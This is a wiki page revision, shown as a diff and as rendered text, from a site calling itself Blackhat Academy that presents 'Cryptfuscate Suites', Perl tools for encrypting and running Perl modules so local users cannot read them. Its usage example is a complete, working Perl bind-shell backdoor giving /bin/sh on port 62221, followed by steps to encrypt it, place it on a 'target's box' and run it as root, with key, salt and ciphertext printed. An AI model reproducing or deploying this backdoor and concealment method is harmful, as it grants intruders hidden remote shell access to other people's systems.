Questions about this topic? Sign up to ask in the talk tab.

Difference between revisions of "User:Haqaholiq/Cryptfuscate-Suites"

From NetSec
Jump to: navigation, search
(Description)
Line 1: Line 1:
 +
{{warning|Neither Blackhat Academy staff or the author are responsible, in any way, for the way in which you use this application pack.}}
 +
 
==Description==
 
==Description==
Cryptfuscate Suites is a package of applications that allow you to keep your Perl source code from being discovered by local users even while being executed.  Cryptfuscate Suites creates and executes encrypted perl modules embedded in a text file.  Cryptfuscate uses the Blowfish algorithm with Cipher-block chaining to encrypt cyrptfuscate modules.  These modules can in turn be executed by Cryptfuscate Suites' Executer keeping your Perl source code secure.  Cryptfuscate Suites is a faster and more time consuming alternative to Perl source code obfuscation.
+
Cryptfuscate Suites is a package of applications that allow you to keep your Perl source code from being discovered by local users even while being executed.  Cryptfuscate Suites creates and executes encrypted perl modules embedded in a text file.  Cryptfuscate uses the Blowfish algorithm with Cipher-block chaining to encrypt cyrptfuscate modules.  These modules can in turn be executed by Cryptfuscate Suites' Executer keeping your Perl source code secure.  Cryptfuscate Suites is a faster and more time consuming alternative to Perl source code obfuscation.  It also is an alternative to fussing with perl2exe.
  
 
==Modules==
 
==Modules==
 
* cryptfuscate.pl - encrypts perl modules embedded in text files to be executed by executer.pl
 
* cryptfuscate.pl - encrypts perl modules embedded in text files to be executed by executer.pl
 
* executer.pl - executes perl modules embedded in 'cryptfuscated' text files.
 
* executer.pl - executes perl modules embedded in 'cryptfuscated' text files.
 +
 +
==Download & Installation==
 +
* '''Download URL''': https://github.com/haqaholiq/Cryptfuscate-Suites/downloads
 +
 +
Choose to download as tar or zip file, unpackage Cryptfuscate Suites, and start using.
 +
 +
==Usage==
 +
 +
Below is an example of a bind shell module for Cryptfuscate Suites:
 +
 +
{{code|text=<source lang="perl">
 +
use strict;
 +
 +
print "  [*] Setting Up Bind Shell on Port 62221...\n";
 +
 +
my $system = '/bin/sh';
 +
my $port = 62221;
 +
 
 +
use IO::Socket::INET;
 +
 
 +
socket(SOCK, PF_INET, SOCK_STREAM, getprotobyname('tcp'))
 +
  or die "  [*] Could not setup backdoor...\n";
 +
 
 +
setsockopt(SOCK, SOL_SOCKET, SO_REUSEADDR, pack("l", 1))
 +
  or die "  [*] Could not setup backdoor...\n";
 +
 
 +
bind(SOCK, sockaddr_in($port, INADDR_ANY))
 +
  or die "  [*] Could not setup backdoor...\n";
 +
 
 +
print "  [*] Done.\n";
 +
   
 +
listen(SOCK, SOMAXCONN)
 +
  or die "  [*] Could not setup backdoor...\n";
 +
 +
while(1){
 +
  accept(CSOCK, SOCK);
 +
   
 +
  if(!(my $pid = fork)){
 +
 
 +
    send(CSOCK, "[*] Connected...\n", 0);
 +
     
 +
    # Build interactive shell
 +
    open(*STDIN, ">&CSOCK");
 +
    open(*STDOUT, ">&CSOCK");
 +
    open(*STDERR, ">&CSOCK");
 +
 +
    system($system);
 +
 +
    close(*STDIN, *STDOUT, *STDERR);
 +
  }
 +
</source>}}
 +
 +
We will name this module bd.txt. (This module can be found on github with the rest of the source.)
 +
 +
Now let's use cryptfuscate.pl to create a encrypted version of bd.txt to use as a payload for executer.pl:
 +
  haqaholiq@blackhatacademy$ ./cryptfuscate.pl
 +
  Plaintext Module Path: bd.txt
 +
  Encrypted Module Path: payload.txt
 +
  Encryption Key: ag2k1l90sjf35fd2s10s029bfguqs52d
 +
  Salt: 19324953
 +
  [*] Text file encrypted successfully...
 +
 +
Our encrypted version of bd.txt (payload.txt):
 +
{{code|text=<source lang="text">U2FsdGVkX18xOTMyNDk1M8JxfiMccqAr+/FkJf415yyn3xLW3hr1P42zo+eqNB2ec5H+21ve08Cq
 +
i9g01PaB/Y0+dEfZKfhZN1ecPgBk9W27sB+z8GG+zNrVnh6kFRIMWNH67yPp7lohB/u0rvt6UkoQ
 +
QV2c4SoY1KGw5307m8XXqm4NEkRUlVAbU2/u7+u8F/GNA//OX7zJ4ygPacb5dQfGjKxhVRwruVbf
 +
qIxVSNPAK+BjsbKDp/FRL1is3+V48ZRz0vpihXFJyHf7gxuCPMHxDoHMTYefwvRZ1JFhpGANtmj4
 +
+wDvcqDBfk+y6yl0BkeqJTKeoweWeJLf5Vfe4OyUMlngc+pBY1SeYfzdnFEH3VUr/hx8yZ0BQlWR
 +
EtdvJJrT652EOS0zS5whZD8d3cRU8eP9yTOqfhz+L5jeIt/zVfVVx2hcCdNMEE64AQ6mXE4AIDy/
 +
k2igd8KskDq1P/H1HHMpnr3ru+YPg1L+WVU2EhfytHjPehu2CQsunhguzoqE0Sqvoj3sMiDSchfM
 +
+MBul0G4H+5a2Nsq9PE5w0nxXcbu/M/e12aE+n9/GAZnvXO7jmP11/f1GGqhcuQ99bgg70IXXVCY
 +
/P+9ccxTJTNrTFNVj983vYD0orQwrM3BxbmgJPvNU9Vqcfo/voGDt7cWTTNgXMg3hjx9OdL5Hd5K
 +
iSq+/QwtZGCMkhV3dEmxBU2qIE/HEkbnbJEGK/UoYhlLasBI9NAk0CMUHaHs7IcS41jgRSHX6hRR
 +
9R8b6WIWyO2ByfR7F/rOl0k3wrDhfMfYOrfXdOzVfiexDBUsZ33ZgC+qwIl2XsAoBw++4wBLWOK7
 +
AmxIkk6pmbioXOFDC36Wk0QvRHU7eYQ4O2LSUIfxW90II+Z0u0GW2wP+lg/SxHO8sv2Dyl66HD9P
 +
wcOsRA0xuOztsmoMdpqQFUs+pT6nzezX2/OMZm3BB9Wqm5HdUp0zMq3xx1tbwmRIlUY3NW7Y4LEk
 +
NBtACZ6CSuFiCACDvAW9WAIVSCE1O3B70dN+jJFiFt1zTjugzrGgyU/aAZYEDzJLa9QRkZl/B9t1
 +
jApfMz2gh5VGlXGKQBV6rCK16t8y/SixbvO95syMitHBVG1+sCGSweuKf6Ogfq+DS3DdNzLwKMPW
 +
zWvyCO/q/BlUq0/aEEutep2igD7sBcfS4y+XrrOz+EKXuh8SKKn209URvkg2DjLUxZmnybDg5b/Y
 +
7CiCfGOvGpA8LGxlGUnVul4ezyJW9wftCsroDvad/Ka/9nJx0Y1npzazsPtkryjVgvlXB6bTVyj8
 +
IlUCkQzGi+LT9xwHZrRBZ/YWerj8C5x3fSu/sC8qCjtIqL7NTVxo</source>}}
 +
 +
Next pack payload.txt with executer.pl and place on your target's box.  Untar and your ready to go execute your module using executer.pl:
 +
  root@targetbox$ ./executer.pl
 +
  Encrypted Module Path: payload.txt
 +
  Decryption Key: ag2k1l90sjf35fd2s10s029bfguqs52d
 +
  Salt: 19324953
 +
    [*] Executing payload...
 +
    [*] Setting Up Bind Shell on Port 62221...
 +
    [*] Done.
 +
 +
We have successfully ran our encrypted bind shell payload on port 62221.  The source of our payload is completely encrypted making it impossible for local users to view the source code without knowing the correct encryption key and salt.

Revision as of 05:55, 11 June 2012

RPU0j.png Neither Blackhat Academy staff or the author are responsible, in any way, for the way in which you use this application pack.

Description

Cryptfuscate Suites is a package of applications that allow you to keep your Perl source code from being discovered by local users even while being executed. Cryptfuscate Suites creates and executes encrypted perl modules embedded in a text file. Cryptfuscate uses the Blowfish algorithm with Cipher-block chaining to encrypt cyrptfuscate modules. These modules can in turn be executed by Cryptfuscate Suites' Executer keeping your Perl source code secure. Cryptfuscate Suites is a faster and more time consuming alternative to Perl source code obfuscation. It also is an alternative to fussing with perl2exe.

Modules

  • cryptfuscate.pl - encrypts perl modules embedded in text files to be executed by executer.pl
  • executer.pl - executes perl modules embedded in 'cryptfuscated' text files.

Download & Installation

Choose to download as tar or zip file, unpackage Cryptfuscate Suites, and start using.

Usage

Below is an example of a bind shell module for Cryptfuscate Suites:

 
use strict;
 
print "  [*] Setting Up Bind Shell on Port 62221...\n";
 
my $system = '/bin/sh';
my $port = 62221;
 
use IO::Socket::INET;
 
socket(SOCK, PF_INET, SOCK_STREAM, getprotobyname('tcp'))
  or die "  [*] Could not setup backdoor...\n";
 
setsockopt(SOCK, SOL_SOCKET, SO_REUSEADDR, pack("l", 1))
  or die "  [*] Could not setup backdoor...\n";
 
bind(SOCK, sockaddr_in($port, INADDR_ANY))
  or die "  [*] Could not setup backdoor...\n";
 
print "  [*] Done.\n";
 
listen(SOCK, SOMAXCONN)
  or die "  [*] Could not setup backdoor...\n";
 
while(1){
  accept(CSOCK, SOCK);
 
  if(!(my $pid = fork)){
 
    send(CSOCK, "[*] Connected...\n", 0);
 
    # Build interactive shell
    open(*STDIN, ">&CSOCK");
    open(*STDOUT, ">&CSOCK");
    open(*STDERR, ">&CSOCK");
 
    system($system);
 
    close(*STDIN, *STDOUT, *STDERR);
  }
 

We will name this module bd.txt. (This module can be found on github with the rest of the source.)

Now let's use cryptfuscate.pl to create a encrypted version of bd.txt to use as a payload for executer.pl:

 haqaholiq@blackhatacademy$ ./cryptfuscate.pl
 Plaintext Module Path: bd.txt
 Encrypted Module Path: payload.txt
 Encryption Key: ag2k1l90sjf35fd2s10s029bfguqs52d 
 Salt: 19324953
 [*] Text file encrypted successfully...

Our encrypted version of bd.txt (payload.txt):

U2FsdGVkX18xOTMyNDk1M8JxfiMccqAr+/FkJf415yyn3xLW3hr1P42zo+eqNB2ec5H+21ve08Cq
i9g01PaB/Y0+dEfZKfhZN1ecPgBk9W27sB+z8GG+zNrVnh6kFRIMWNH67yPp7lohB/u0rvt6UkoQ
QV2c4SoY1KGw5307m8XXqm4NEkRUlVAbU2/u7+u8F/GNA//OX7zJ4ygPacb5dQfGjKxhVRwruVbf
qIxVSNPAK+BjsbKDp/FRL1is3+V48ZRz0vpihXFJyHf7gxuCPMHxDoHMTYefwvRZ1JFhpGANtmj4
+wDvcqDBfk+y6yl0BkeqJTKeoweWeJLf5Vfe4OyUMlngc+pBY1SeYfzdnFEH3VUr/hx8yZ0BQlWR
EtdvJJrT652EOS0zS5whZD8d3cRU8eP9yTOqfhz+L5jeIt/zVfVVx2hcCdNMEE64AQ6mXE4AIDy/
k2igd8KskDq1P/H1HHMpnr3ru+YPg1L+WVU2EhfytHjPehu2CQsunhguzoqE0Sqvoj3sMiDSchfM
+MBul0G4H+5a2Nsq9PE5w0nxXcbu/M/e12aE+n9/GAZnvXO7jmP11/f1GGqhcuQ99bgg70IXXVCY
/P+9ccxTJTNrTFNVj983vYD0orQwrM3BxbmgJPvNU9Vqcfo/voGDt7cWTTNgXMg3hjx9OdL5Hd5K
iSq+/QwtZGCMkhV3dEmxBU2qIE/HEkbnbJEGK/UoYhlLasBI9NAk0CMUHaHs7IcS41jgRSHX6hRR
9R8b6WIWyO2ByfR7F/rOl0k3wrDhfMfYOrfXdOzVfiexDBUsZ33ZgC+qwIl2XsAoBw++4wBLWOK7
AmxIkk6pmbioXOFDC36Wk0QvRHU7eYQ4O2LSUIfxW90II+Z0u0GW2wP+lg/SxHO8sv2Dyl66HD9P
wcOsRA0xuOztsmoMdpqQFUs+pT6nzezX2/OMZm3BB9Wqm5HdUp0zMq3xx1tbwmRIlUY3NW7Y4LEk
NBtACZ6CSuFiCACDvAW9WAIVSCE1O3B70dN+jJFiFt1zTjugzrGgyU/aAZYEDzJLa9QRkZl/B9t1
jApfMz2gh5VGlXGKQBV6rCK16t8y/SixbvO95syMitHBVG1+sCGSweuKf6Ogfq+DS3DdNzLwKMPW
zWvyCO/q/BlUq0/aEEutep2igD7sBcfS4y+XrrOz+EKXuh8SKKn209URvkg2DjLUxZmnybDg5b/Y
7CiCfGOvGpA8LGxlGUnVul4ezyJW9wftCsroDvad/Ka/9nJx0Y1npzazsPtkryjVgvlXB6bTVyj8
IlUCkQzGi+LT9xwHZrRBZ/YWerj8C5x3fSu/sC8qCjtIqL7NTVxo

Next pack payload.txt with executer.pl and place on your target's box. Untar and your ready to go execute your module using executer.pl:

 root@targetbox$ ./executer.pl
 Encrypted Module Path: payload.txt
 Decryption Key: ag2k1l90sjf35fd2s10s029bfguqs52d
 Salt: 19324953
   [*] Executing payload...
   [*] Setting Up Bind Shell on Port 62221...
   [*] Done.

We have successfully ran our encrypted bind shell payload on port 62221. The source of our payload is completely encrypted making it impossible for local users to view the source code without knowing the correct encryption key and salt.